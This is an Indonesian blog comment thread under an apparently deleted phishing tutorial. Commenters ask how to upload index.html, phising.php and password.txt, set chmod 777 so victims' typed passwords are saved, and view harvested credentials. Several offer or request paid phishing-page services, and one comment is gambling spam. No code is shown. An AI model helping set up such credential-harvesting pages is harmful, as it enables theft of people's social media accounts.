        ok makasih mas gan

        Reply
      • epy

        August 23, 2013 at 7:09 am

        maaf tanya lagi mas gan, permission/chmod
        di atur 777 itu letaknya dmna?maksih

        Reply
  81. jafar

    August 25, 2013 at 12:49 am

    gan,kok 3 yg di upload?? kan cuma 2???
    treus ksih tutor domainya dan hostingnya dong

    Reply
    • Amri

      August 25, 2013 at 4:09 am

      Masa sih cuma 2 ? coba dibaca lagi. Wah, ini udah mainan lama udah nggak main kaya beginian lagi. hehee

      Reply
      • jafar

        August 31, 2013 at 10:50 am

        o ya 3,yg ekstensi d jadiin 2 yaa..
        cra gnti chmodnya gmn??

        Reply
        • Amri

          August 31, 2013 at 12:48 pm

          Yang ekstensi di jadiin 2 gimana ? Cara gandi chmodnya di file manager cpanel hostingnya, nanti ada tulisan chmod atau permission.

          Reply
  82. Fay Likers

    August 31, 2013 at 10:26 pm

    Hahahah
    Buahhahahah masa bkin web phsing aja pada kga becus.
    Itu lagih masa bkin password.txt aja pda ga ngrti.
    Add fb gue coy. Biar lo pada pintar
    buahhahahah
    http://www.facebook.com/faylikers Di tunggu All Broo,
    Min bagus ente udh Post.
    mat knal ye

    Reply
  83. Fikri

    October 31, 2013 at 8:13 pm

    lokasi upload dimn gan,,,, ?

    Reply
    • fzcraft

      January 2, 2014 at 11:54 am

      Terserah

      Reply
  84. muhammad adham

    December 19, 2013 at 10:47 pm

    maksud Ini apa yah ??
    Setelah ke-3 file berhasil di upload jangan lupa permission/chmod di atur 777 untuk filepasswords.txt, agar password yang di ketikan oleh korban dapat tersimpan.

    Reply
    • fzcraft

      January 2, 2014 at 11:53 am

      Gini lho Buat file passwords.txt kosong jangan di edit dalamnya

      Reply
  85. Shadow

    December 27, 2013 at 3:30 pm

    kalau domainnya pake facebook gimana bang

    Reply
    • Daffa

      May 5, 2015 at 3:38 pm

      Mana mungkin bisa gan

      Reply
  86. Shadow

    December 27, 2013 at 3:30 pm

    tolong bales gan

    Reply
  87. getsa novandra

    January 9, 2014 at 8:34 pm

    terima kasih kak saya sudah bisa nih

    Reply
  88. raja doli

    March 8, 2014 at 11:39 pm

    nmr 13 gmna gan

    Reply
  89. ivhot pebrian

    May 16, 2014 at 1:36 pm

    kakak saya belum ngerti, tolong jelasin dong kakak, kalau bisa lewat email, [email protected]

    Reply
  90. andri

    June 5, 2014 at 11:09 am

    gan saya tidak mengerti No. 15 sampai 19. . . .
    gimana caranya gan. . . . .

    Reply
  91. dodo

    June 26, 2014 at 9:30 am

    SAYA UCAPKAN TERIMA KASIH KEPADA MBAH_KERAMAT, YG SUDAH MEMBANTU KESUSAHAN SAYA DENGAN MEMBERIKAN NOMOR TOGEL KEPADA SAYA.
    SAYA SANGAT BERSUKUR SEKALI KARENA NOMOR YG DIBERIKAN 4D(0215) TEMBUS 100%.
    BERKAT SEMUA ITU SAYA SUDAH LUNASI HUTANG2 SAYA SEBANYAK 175 JUTA DI BANK BRI.
    DAN SAYA SUDAH BUKA USAHA BERKAT MENANG NOMOR TOGEL YANG DI BERIKAN SAMA MBAH_KERAMAT…..
    -JIKA ANDA SERING KALAH DALAM BERMAIN TOGEL?
    -APAKAH ANDA TERMASUK DALAM KATEGORI DIBAWAH INI
    1. Di Lilit Hutang
    2. Selalu kalah Dalam Bermain Togel
    3. Barang berharga Anda udah Habis Buat Judi Togel
    4. Anda Udah ke mana-mana tapi tidak menghasilkan Solusi yang tepat.
    HUB MBAH_KERAMAT DI NO: 0878-4293-7066-
    .ANGKA TOGEL YANG DIBERIKAN MBAH_KERAMAT. TIDAK PERLU DIRAGUKAN LAGI.SAYA JAMIN 100% TEMBUS . SOAL YA SAYA SUDAH MEMBUKTIKAN 5X PUTARAN SAYA DIBANTUH
    DIJAMIN ANDA PASTI MENANG SEPERTI SAYA>>>>>>
    .(`??.?(` ??. ?* ?.???)?.???)..
    ?? Thanks sOb rOoMnyA ?`?
    ..(?. ???(?.??? * `??.?)`??.? )..
    SALAM KOMPAK SELALU?.dan selamat buat yg JEPE hari ini?..
    ???????????????

    Reply
  92. ZXCVAKZlaM

    June 26, 2014 at 5:07 pm

    KA ini page source FB nya udah beda jadi gimana dong?

    Reply
  93. Anonymous&

    September 2, 2014 at 7:35 pm

    Gw Sih Sudah Bisa Buat Phising Tapi Percuma../ Karena Di Blockir Sm Internet Positif
    Jdi Gk Bisa Di Buka ๐Ÿ™

    Reply
  94. Muhammad Zulfan

    September 10, 2014 at 10:03 am

    Nice bro :3

    Reply
  95. Fachrul Izzami

    December 2, 2014 at 9:08 am

    kalo buat gemscool bisa ?

    Reply
    • Daffa

      May 5, 2015 at 3:36 pm

      Mau bikin phising untuk gemscool mas?

      Reply
  96. ady

    April 18, 2015 at 3:37 pm

    boss kok phising sy gak jaadi”
    ada no yg bisa di hubungi kah boss ?

    Reply
  97. ady

    April 18, 2015 at 3:38 pm

    gua udah buka link gua, tapi yg muncil hanya INDEX OF/
    umpan scripnya kayak gak berfungsi

    Reply
  98. Daffa

    May 5, 2015 at 3:34 pm

    PHP nya bermasalah mas. Malah muncul”Parse error: syntax error, unexpected ‘=’ in /home/u920835651/public_html/phising.php on line 5″

    Reply
  99. Aliefki Pradithya

    September 27, 2015 at 2:58 pm

    gan cara liat passwordnya gimana??

    Reply
  100. deka miranda

    October 5, 2015 at 2:44 pm

    mas kok form action di wordpad ane gk ada…..?

    Reply
    • Rafli Diansyah Putra

      December 19, 2016 at 4:53 pm

      cari method .. pasti ketemu action nya ..

      Reply
  101. Herman

    October 28, 2015 at 4:22 pm

    Gw Kgk bisa Install File di Free Hosting 000webhost

    Reply
  102. unknow

    January 7, 2016 at 4:31 pm

    kok g ke simpen di password.txt ya?

    Reply
  103. indra romigo

    October 7, 2016 at 4:18 pm

    gan saya bisa mnta tolong..buat kan fishing,,saya nggak ngerti

    Reply
  104. ourmine

    October 14, 2016 at 8:54 pm

    Gan password.txt nya ketinggalan tu blm ente posting

    Reply
  105. ourmine

    October 14, 2016 at 9:00 pm

    Menerima jasa pembuatan web phising COC, FB, IG dan TWITTER.
    add pin bb: D1CBA539

    Reply
  106. Rafli Diansyah Putra

    December 19, 2016 at 4:58 pm

    saya gak mau beli mas tapi ajarin saya aja .. ntar saya kasih pulsa .. kalau work ..

    Reply
  107. Eka

    March 19, 2017 at 7:05 am

    Gimana si sy masi blm ngerti tolong jawab

    Reply
    • Eka

      March 19, 2017 at 7:06 am

      Klo work sy kasi akun klo work y

      Reply
  108. yutim

    March 22, 2017 at 3:00 pm

    Membuatnya Dari HP bisa gk broo.

    Reply
    • Amri

      March 28, 2017 at 5:29 pm

      bisa sebenarnya tapi ribet dan tutorial ini menggunakan komputer

      Reply
  109. achir

    March 28, 2017 at 2:01 pm

    kok yang di upload ada 3, padahal kan file yang di buat di notepad cuman 2, yang satu di mana gan…?

    Reply
    • Amri

      March 28, 2017 at 5:29 pm

      Maaf sebelumnya karena jarang keurus blog nya jadi banyak post yang error..
      Untuk file yang diupload ada 3 yaitu : index.html, phising.php dan password.txt

      Reply
  110. Till Skyfall

    April 18, 2017 at 9:47 am

    Jasa Pembuatan Web Phising: D815A16C

    Reply
    • baden

      May 3, 2017 at 12:19 pm

      terima jasa pembuatan phising gan

      Reply
  111. Ramdhan

    May 20, 2017 at 10:59 pm

    meriksa email dan pw korban d mana gan?? mohon penjelasannya

    Reply
  112. Indra Fata Eberta

    May 22, 2017 at 2:58 pm

    bang cara lihat password korban dan situs web phising kita dimana ya ?

    Reply
    • Sandi Noer

      September 23, 2017 at 3:48 pm

      Sama gan yg saya juga gak ada pemberitahuan

      Reply
  113. ian

    June 21, 2017 at 3:43 pm

    keluar ginian aja
    Parse error: syntax error, unexpected ‘=’ in /storage/ssd1/993/2028993/public_html/phising.php on line 5
    trus gmna???

    Reply
  114. Ahmad Hanief

    July 1, 2017 at 11:00 am

    apa itu permission/chmod

    Reply
  115. Sayyid N R

    September 27, 2017 at 10:38 am

    cara spoofing nya kaya mana ?

    Reply
  116. Demas Reyhan Adritama

    November 23, 2017 at 12:46 pm

    password.txt buatnya gimana ?

    Reply
  117. kafka hakc20

    March 4, 2018 at 11:07 pm

    saya masih blom bisa tolong bantu saya plizzz…

    Reply
  118. hasbizainal

    January 8, 2019 at 1:13 pm

    buat kan web phising nya admin nanti gue bayar brp pun jadi

    Reply
  119. Sicantik Huked

    January 24, 2019 at 6:54 pm

    Bagus Sangat Bermanfat ๐Ÿ™‚
    Jangan Lupa Mampir Juga KeBlogku Yah ๐Ÿ™‚

    Reply
  120. Rudy Wahyu

    April 22, 2019 at 2:12 pm

    punya ku pas ngakses phising.php kok error kenapa ya bang

    Reply
  121. Reza Hidayat

    October 7, 2019 at 4:18 pm

    cara buat file password.txt nya gimna?….kok saya ada 2 file doang

    Reply

Leave a Reply

Your email address will not be published.